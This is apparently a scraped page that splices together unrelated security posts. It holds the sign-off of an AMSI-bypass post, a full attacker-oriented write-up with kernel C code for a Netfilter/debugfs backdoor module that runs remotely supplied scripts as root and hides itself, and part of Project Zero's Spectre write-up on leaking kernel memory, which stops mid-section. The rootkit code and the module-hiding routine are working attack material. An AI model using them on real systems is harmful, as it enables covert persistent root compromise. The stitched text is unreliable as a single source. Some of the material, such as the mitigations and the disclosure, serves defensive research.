This technique is awesome and extremly useful. You can put to use a handful of PowerShell post-exploitation scripts like Nishang, Powersploit and any other PoSH hacking tool that once was blocked by the annoying AMSI.

I hope you liked this post, all the credits for the technique goes to guys from CyberArk website, I only showed how to effectively use it in a real-life scenario from an attacker perspective.

Best regards,

zc00l.

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

AMD ARM Reading privileged memory with a side-channel

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

 

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

 

So far, there are three known variants of the issue:

 

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

 

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

 

 

During the course of our research, we developed the following proofs of concept (PoCs):

 

  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel’s BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn’t been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

 

For interesting resources around this topic, look down into the «Literature» section.

 

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

 

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

 

The PoC code and the writeups that we sent to the CPU vendors are available here:https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called «Intel Haswell Xeon CPU» in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called «AMD FX CPU» in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called «AMD PRO CPU» in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called «ARM Cortex A57» in the rest of this document)

Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

 

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

 

cached/uncached data: In this blogpost, «uncached» data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

 

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

 

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

 

  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

 

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 («Branch Prediction»):

 

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

 

In section 2.3.5.2 («L1 DCache»):

 

Loads can:
[…]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

 

Intel’s Software Developer’s Manual [7] states in Volume 3A, section 11.7 («Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors»):

 

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …;
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 …
}
However, in the following code sample, there’s an issue. If arr1->length, arr2->data[0x200] andarr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

 

  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …; /* small array */
struct array *arr2 = …; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 unsigned long index2 = ((value&1)*0x100)+0x200;
 if (index2 < arr2->length) {
   unsigned char value2 = arr2->data[index2];
 }
}

 

After the execution has been returned to the non-speculative path because the processor has noticed thatuntrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] andarr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 — which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

 

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

 

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

 

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

 

  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

 

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

 

Whether the JIT engine is enabled depends on a run-time configuration setting — but at least on the tested Intel processor, the attack works independent of that setting.

 

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

 

eBPF’s data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

 

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn’t be a precondition in principle).

 

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array’s length to be slow on other physical CPU cores (intentional false sharing).

 

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling throughprog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

 

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

 

 

 

This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

 

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

 

 

 

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

 

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

 

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

 

This program reads 8-byte-aligned 64-bit values from an eBPF data array «victim_map» at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

 

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_mapthat causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other’s branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

 

 

 

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won’t know the true destination of the jump, and it won’t be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel’s processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

 

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

 

Haswell seems to have multiple branch prediction mechanisms that work very differently:

 

  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel’s optimization manual, but we haven’t analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn’t store the full, absolute destination address.

 

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

 

bit A
bit B
0x40.0000
0x2000
0x80.0000
0x4000
0x100.0000
0x8000
0x200.0000
0x1.0000
0x400.0000
0x2.0000
0x800.0000
0x4.0000
0x2000.0000
0x10.0000
0x4000.0000
0x20.0000

 

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can’t distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

 

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn’t been verified.

 

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

 

  • The low 12 bits of the address of the source instruction (we are not sure whether it’s the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

 

If the indirect call predictor can’t resolve a branch, it is resolved by the generic predictor instead. Intel’s optimization manual hints at this behavior: «Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior.»

 

The branch history buffer (BHB) stores information about the last 29 taken branches — basically a fingerprint of recent control flow — and is used to allow better prediction of indirect calls that can have multiple targets.

 

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

 

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
 *bhb_state <<= 2;
 *bhb_state ^= (dst & 0x3f);
 *bhb_state ^= (src & 0xc0) >> 6;
 *bhb_state ^= (src & 0xc00) >> (10 — 2);
 *bhb_state ^= (src & 0xc000) >> (14 — 4);
 *bhb_state ^= (src & 0x30) << (6 — 4);
 *bhb_state ^= (src & 0x300) << (8 — 8);
 *bhb_state ^= (src & 0x3000) >> (12 — 10);
 *bhb_state ^= (src & 0x30000) >> (16 — 12);
 *bhb_state ^= (src & 0xc0000) >> (18 — 14);
}

 

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn’t been understood yet.

 

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code — for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn’t keep a detailed record of what we were doing.

 

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked — however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

 

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

 

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to «recent program behavior» in Intel’s optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

 

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

 

 

 

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

 

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

 

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

 

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don’t influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn’t influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

 

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn’t store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

 

However, a history buffer needs to «forget» about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards — and given that, upwards combination of information probably wouldn’t be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

 

 

 

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

 

